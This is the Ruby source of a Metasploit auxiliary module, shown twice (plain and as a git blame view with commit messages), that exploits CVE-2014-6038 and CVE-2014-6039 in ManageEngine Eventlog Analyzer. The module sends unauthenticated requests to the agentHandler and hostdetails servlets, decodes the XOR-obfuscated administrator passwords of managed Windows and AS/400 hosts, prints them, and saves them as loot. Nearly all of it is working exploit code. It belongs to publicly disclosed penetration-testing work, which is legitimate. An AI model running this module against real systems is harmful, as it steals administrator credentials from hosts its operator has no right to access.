metasploit-framework/modules/auxiliary/gather/eventlog_cred_disclosure.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',
      'Description' => %q{
        ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that
        allow an unauthenticated user to obtain the superuser password of any managed Windows and
        AS/400 hosts. This module abuses both vulnerabilities to collect all the available
        usernames and passwords. First the agentHandler servlet is abused to get the hostid and
        slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames
        and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,
        the TARGETURI has to be prepended with /event.
      },
      'Author' =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2014-6038' ],
          [ 'CVE', '2014-6039' ],
          [ 'OSVDB', '114342' ],
          [ 'OSVDB', '114344' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/12' ]
        ],
      'DisclosureDate' => 'Nov 5 2014'))

    register_options(
      [
        Opt::RPORT(8400),
        OptString.new('TARGETURI', [ true,  'Eventlog Analyzer application URI (should be /event for version 7)', '/']),
      ], self.class)
  end


  def decode_password(encoded_password)
    password_xor = Rex::Text.decode_base64(encoded_password)
    password = ''
    password_xor.bytes.each do |byte|
      password << (byte ^ 0x30)
    end
    return password
  end


  def run
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'agentHandler'),
      'method' =>'GET',
      'vars_get' => {
        'mode' => 'getTableData',
        'table' => 'HostDetails'
      }
    })

    unless res && res.code == 200
      fail_with(Failure::NotFound, "#{peer} - Failed to reach agentHandler servlet")
      return
    end

    # When passwords have digits the XML parsing will fail.
    # Replace with an empty password attribute so that we know the device has a password
    # and therefore we want to add it to our host list.
    xml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))
    begin
      doc = REXML::Document.new(xml)
    rescue
      fail_with(Failure::Unknown, "#{peer} - Error parsing the XML, dumping output #{xml}")
    end

    slid_host_ary = []
    doc.elements.each('Details/HostDetails') do |ele|
      if ele.attributes['password']
        # If an element doesn't have a password, then we don't care about it.
        # Otherwise store the slid and host_id to use later.
        slid_host_ary << [ele.attributes['slid'], ele.attributes['host_id']]
      end
    end

    cred_table = Rex::Ui::Text::Table.new(
      'Header'  => 'ManageEngine EventLog Analyzer Managed Devices Credentials',
      'Indent'  => 1,
      'Columns' =>
        [
          'Host',
          'Type',
          'SubType',
          'Domain',
          'Username',
          'Password',
        ]
    )

    slid_host_ary.each do |host|
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'hostdetails'),
        'method' =>'GET',
        'vars_get' => {
          'slid' => host[0],
          'hostid' => host[1]
        }
      })

      unless res && res.code == 200
        fail_with(Failure::NotFound, "#{peer} - Failed to reach hostdetails servlet")
      end

      begin
        doc = REXML::Document.new(res.body)
      rescue
        fail_with(Failure::Unknown, "#{peer} - Error parsing the XML, dumping output #{res.body.to_s}")
      end

      doc.elements.each('Details/Hosts') do |ele|
        # Add an empty string if a variable doesn't exist, we have to check it
        # somewhere and it's easier to do it here.
        host_ipaddress = ele.attributes['host_ipaddress'] || ''

        ele.elements.each('HostDetails') do |details|
          domain_name = details.attributes['domain_name'] || ''
          username = details.attributes['username'] || ''
          password_encoded = details.attributes['password'] || ''
          password = decode_password(password_encoded)
          type = details.attributes['type'] || ''
          subtype = details.attributes['subtype'] || ''

          unless type =~ /Windows/ || subtype =~ /Windows/
            # With AS/400 we get some garbage in the domain name even though it doesn't exist
            domain_name = ""
          end

          msg = "Got login to #{host_ipaddress} | running "
          msg << type << (subtype != '' ? " | #{subtype}" : '')
          msg << ' | username: '
          msg << (domain_name != '' ? "#{domain_name}\\#{username}" : username)
          msg << " | password: #{password}"
          print_good(msg)

          cred_table << [host_ipaddress, type, subtype, domain_name, username, password]

          if type == 'Windows'
            service_name = 'epmap'
            port = 135
          elsif type == 'IBM AS/400'
            service_name = 'as-servermap'
            port = 449
          else
            next
          end

          credential_core = report_credential_core({
             password: password,
             username: username,
           })

          host_login_data = {
            address: host_ipaddress,
            service_name: service_name,
            workspace_id: myworkspace_id,
            protocol: 'tcp',
            port: port,
            core: credential_core,
            status: Metasploit::Model::Login::Status::UNTRIED
          }
          create_credential_login(host_login_data)
        end
      end
    end

    print_line
    print_line("#{cred_table}")
    loot_name     = 'manageengine.eventlog.managed_hosts.creds'
    loot_type     = 'text/csv'
    loot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'
    loot_desc     = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'
    p = store_loot(
      loot_name,
      loot_type,
      rhost,
      cred_table.to_csv,
      loot_filename,
      loot_desc)
    print_status "Credentials saved in: #{p}"
  end


  def report_credential_core(cred_opts={})
    # Set up the has for our Origin service
    origin_service_data = {
      address: rhost,
      port: rport,
      service_name: (ssl ? 'https' : 'http'),
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: self.fullname,
      private_type: :password,
      private_data: cred_opts[:password],
      username: cred_opts[:username]
    }

    credential_data.merge!(origin_service_data)
    create_credential(credential_data)
  end
end
Push exploit for CVE-2014-6038/39 2014-11-05 20:12:03 +00:00			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'rexml/document'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Auxiliary::Report`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',`
			`'Description' => %q{`
No more than 100 columns on description 2014-11-08 02:29:38 +00:00			`ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that`
			`allow an unauthenticated user to obtain the superuser password of any managed Windows and`
			`AS/400 hosts. This module abuses both vulnerabilities to collect all the available`
			`usernames and passwords. First the agentHandler servlet is abused to get the hostid and`
Minor typos and grammar fixes 2014-11-13 20:48:23 +00:00			`slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames`
			`and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,`
No more than 100 columns on description 2014-11-08 02:29:38 +00:00			`the TARGETURI has to be prepended with /event.`
Push exploit for CVE-2014-6038/39 2014-11-05 20:12:03 +00:00			`},`
			`'Author' =>`
			`[`
			`'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2014-6038' ],`
			`[ 'CVE', '2014-6039' ],`
Add OSVDB ids 2014-11-08 11:05:34 +00:00			`[ 'OSVDB', '114342' ],`
			`[ 'OSVDB', '114344' ],`
Push exploit for CVE-2014-6038/39 2014-11-05 20:12:03 +00:00			`[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt' ],`
Add full disclosure URL 2014-11-07 08:06:21 +00:00			`[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/12' ]`
Push exploit for CVE-2014-6038/39 2014-11-05 20:12:03 +00:00			`],`
			`'DisclosureDate' => 'Nov 5 2014'))`

			`register_options(`
			`[`
Use built-in format for RPORT 2014-11-08 02:30:32 +00:00			`Opt::RPORT(8400),`
Use single quotes without interpolation 2014-11-08 02:46:47 +00:00			`OptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),`
Push exploit for CVE-2014-6038/39 2014-11-05 20:12:03 +00:00			`], self.class)`
			`end`


			`def decode_password(encoded_password)`
			`password_xor = Rex::Text.decode_base64(encoded_password)`
Use single quotes without interpolation 2014-11-08 02:46:47 +00:00			`password = ''`
Push exploit for CVE-2014-6038/39 2014-11-05 20:12:03 +00:00			`password_xor.bytes.each do \|byte\|`
			`password << (byte ^ 0x30)`
			`end`
			`return password`
			`end`


			`def run`
			`res = send_request_cgi({`
Use single quotes without interpolation 2014-11-08 02:46:47 +00:00			`'uri' => normalize_uri(target_uri.path, 'agentHandler'),`
Push exploit for CVE-2014-6038/39 2014-11-05 20:12:03 +00:00			`'method' =>'GET',`
Address Juan's points 2014-11-06 21:02:28 +00:00			`'vars_get' => {`
			`'mode' => 'getTableData',`
			`'table' => 'HostDetails'`
			`}`
Push exploit for CVE-2014-6038/39 2014-11-05 20:12:03 +00:00			`})`

Reduce code complexity 2014-11-08 02:32:15 +00:00			`unless res && res.code == 200`
Use fail_with 2014-11-08 02:33:33 +00:00			`fail_with(Failure::NotFound, "#{peer} - Failed to reach agentHandler servlet")`
Reduce code complexity 2014-11-08 02:32:15 +00:00			`return`
			`end`

			`# When passwords have digits the XML parsing will fail.`
			`# Replace with an empty password attribute so that we know the device has a password`
			`# and therefore we want to add it to our host list.`
			`xml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))`
			`begin`
			`doc = REXML::Document.new(xml)`
			`rescue`
			`fail_with(Failure::Unknown, "#{peer} - Error parsing the XML, dumping output #{xml}")`
			`end`
Use fail_with 2014-11-08 02:33:33 +00:00
Reduce code complexity 2014-11-08 02:32:15 +00:00			`slid_host_ary = []`
			`doc.elements.each('Details/HostDetails') do \|ele\|`
Use single quotes without interpolation 2014-11-08 02:46:47 +00:00			`if ele.attributes['password']`
Reduce code complexity 2014-11-08 02:32:15 +00:00			`# If an element doesn't have a password, then we don't care about it.`
			`# Otherwise store the slid and host_id to use later.`
Use single quotes without interpolation 2014-11-08 02:46:47 +00:00			`slid_host_ary << [ele.attributes['slid'], ele.attributes['host_id']]`
Push exploit for CVE-2014-6038/39 2014-11-05 20:12:03 +00:00			`end`
Reduce code complexity 2014-11-08 02:32:15 +00:00			`end`

			`cred_table = Rex::Ui::Text::Table.new(`
			`'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',`
			`'Indent' => 1,`
			`'Columns' =>`
			`[`
			`'Host',`
			`'Type',`
			`'SubType',`
			`'Domain',`
			`'Username',`
			`'Password',`
			`]`
			`)`

			`slid_host_ary.each do \|host\|`
			`res = send_request_cgi({`
Use single quotes without interpolation 2014-11-08 02:46:47 +00:00			`'uri' => normalize_uri(target_uri.path, 'hostdetails'),`
Reduce code complexity 2014-11-08 02:32:15 +00:00			`'method' =>'GET',`
			`'vars_get' => {`
			`'slid' => host[0],`
			`'hostid' => host[1]`
			`}`
			`})`

Reduce code complexity 2014-11-08 02:37:40 +00:00			`unless res && res.code == 200`
			`fail_with(Failure::NotFound, "#{peer} - Failed to reach hostdetails servlet")`
			`end`

			`begin`
			`doc = REXML::Document.new(res.body)`
			`rescue`
			`fail_with(Failure::Unknown, "#{peer} - Error parsing the XML, dumping output #{res.body.to_s}")`
			`end`

			`doc.elements.each('Details/Hosts') do \|ele\|`
			`# Add an empty string if a variable doesn't exist, we have to check it`
			`# somewhere and it's easier to do it here.`
Use single quotes without interpolation 2014-11-08 02:46:47 +00:00			`host_ipaddress = ele.attributes['host_ipaddress'] \|\| ''`
Reduce code complexity 2014-11-08 02:37:40 +00:00
			`ele.elements.each('HostDetails') do \|details\|`
Use single quotes without interpolation 2014-11-08 02:46:47 +00:00			`domain_name = details.attributes['domain_name'] \|\| ''`
			`username = details.attributes['username'] \|\| ''`
			`password_encoded = details.attributes['password'] \|\| ''`
Reduce code complexity 2014-11-08 02:37:40 +00:00			`password = decode_password(password_encoded)`
Use single quotes without interpolation 2014-11-08 02:46:47 +00:00			`type = details.attributes['type'] \|\| ''`
			`subtype = details.attributes['subtype'] \|\| ''`
Reduce code complexity 2014-11-08 02:37:40 +00:00
Use unless over if not 2014-11-08 02:42:08 +00:00			`unless type =~ /Windows/ \|\| subtype =~ /Windows/`
Reduce code complexity 2014-11-08 02:37:40 +00:00			`# With AS/400 we get some garbage in the domain name even though it doesn't exist`
			`domain_name = ""`
			`end`

			`msg = "Got login to #{host_ipaddress} \| running "`
Use single quotes without interpolation 2014-11-08 02:46:47 +00:00			`msg << type << (subtype != '' ? " \| #{subtype}" : '')`
			`msg << ' \| username: '`
Use single quotes 2014-11-08 02:48:04 +00:00			`msg << (domain_name != '' ? "#{domain_name}\\#{username}" : username)`
Reduce code complexity 2014-11-08 02:37:40 +00:00			`msg << " \| password: #{password}"`
			`print_good(msg)`

			`cred_table << [host_ipaddress, type, subtype, domain_name, username, password]`

Guess service name and port 2014-11-08 02:56:01 +00:00			`if type == 'Windows'`
			`service_name = 'epmap'`
			`port = 135`
			`elsif type == 'IBM AS/400'`
			`service_name = 'as-servermap'`
			`port = 449`
			`else`
			`next`
			`end`

Reduce code complexity 2014-11-08 02:37:40 +00:00			`credential_core = report_credential_core({`
			`password: password,`
			`username: username,`
			`})`

Delete unnecessary begin..end block 2014-11-08 02:38:36 +00:00			`host_login_data = {`
			`address: host_ipaddress,`
Guess service name and port 2014-11-08 02:56:01 +00:00			`service_name: service_name,`
Delete unnecessary begin..end block 2014-11-08 02:38:36 +00:00			`workspace_id: myworkspace_id,`
			`protocol: 'tcp',`
Guess service name and port 2014-11-08 02:56:01 +00:00			`port: port,`
Delete unnecessary begin..end block 2014-11-08 02:38:36 +00:00			`core: credential_core,`
			`status: Metasploit::Model::Login::Status::UNTRIED`
			`}`
			`create_credential_login(host_login_data)`
Push exploit for CVE-2014-6038/39 2014-11-05 20:12:03 +00:00			`end`
			`end`
			`end`
Reduce code complexity 2014-11-08 02:32:15 +00:00
			`print_line`
			`print_line("#{cred_table}")`
			`loot_name = 'manageengine.eventlog.managed_hosts.creds'`
			`loot_type = 'text/csv'`
			`loot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'`
			`loot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'`
			`p = store_loot(`
			`loot_name,`
			`loot_type,`
			`rhost,`
			`cred_table.to_csv,`
			`loot_filename,`
			`loot_desc)`
			`print_status "Credentials saved in: #{p}"`
Push exploit for CVE-2014-6038/39 2014-11-05 20:12:03 +00:00			`end`
Address Juan's points 2014-11-06 21:02:28 +00:00

			`def report_credential_core(cred_opts={})`
			`# Set up the has for our Origin service`
			`origin_service_data = {`
			`address: rhost,`
			`port: rport,`
			`service_name: (ssl ? 'https' : 'http'),`
			`protocol: 'tcp',`
			`workspace_id: myworkspace_id`
			`}`

			`credential_data = {`
			`origin_type: :service,`
			`module_fullname: self.fullname,`
			`private_type: :password,`
			`private_data: cred_opts[:password],`
			`username: cred_opts[:username]`
			`}`

			`credential_data.merge!(origin_service_data)`
			`create_credential(credential_data)`
			`end`
Push exploit for CVE-2014-6038/39 2014-11-05 20:12:03 +00:00			`end`